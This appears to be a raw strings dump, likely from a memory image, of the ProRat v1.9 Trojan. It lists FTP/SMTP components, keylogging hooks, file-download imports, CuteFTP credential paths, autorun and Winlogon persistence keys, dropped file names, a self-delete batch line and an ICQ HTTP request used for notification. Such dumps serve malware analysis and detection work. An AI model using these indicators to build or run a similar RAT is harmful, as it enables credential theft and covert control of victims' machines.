elemType->tpClass.tpcFlags & CF_HAS_DTOR
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
JPEG error #%d

services.exe_1588:




.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
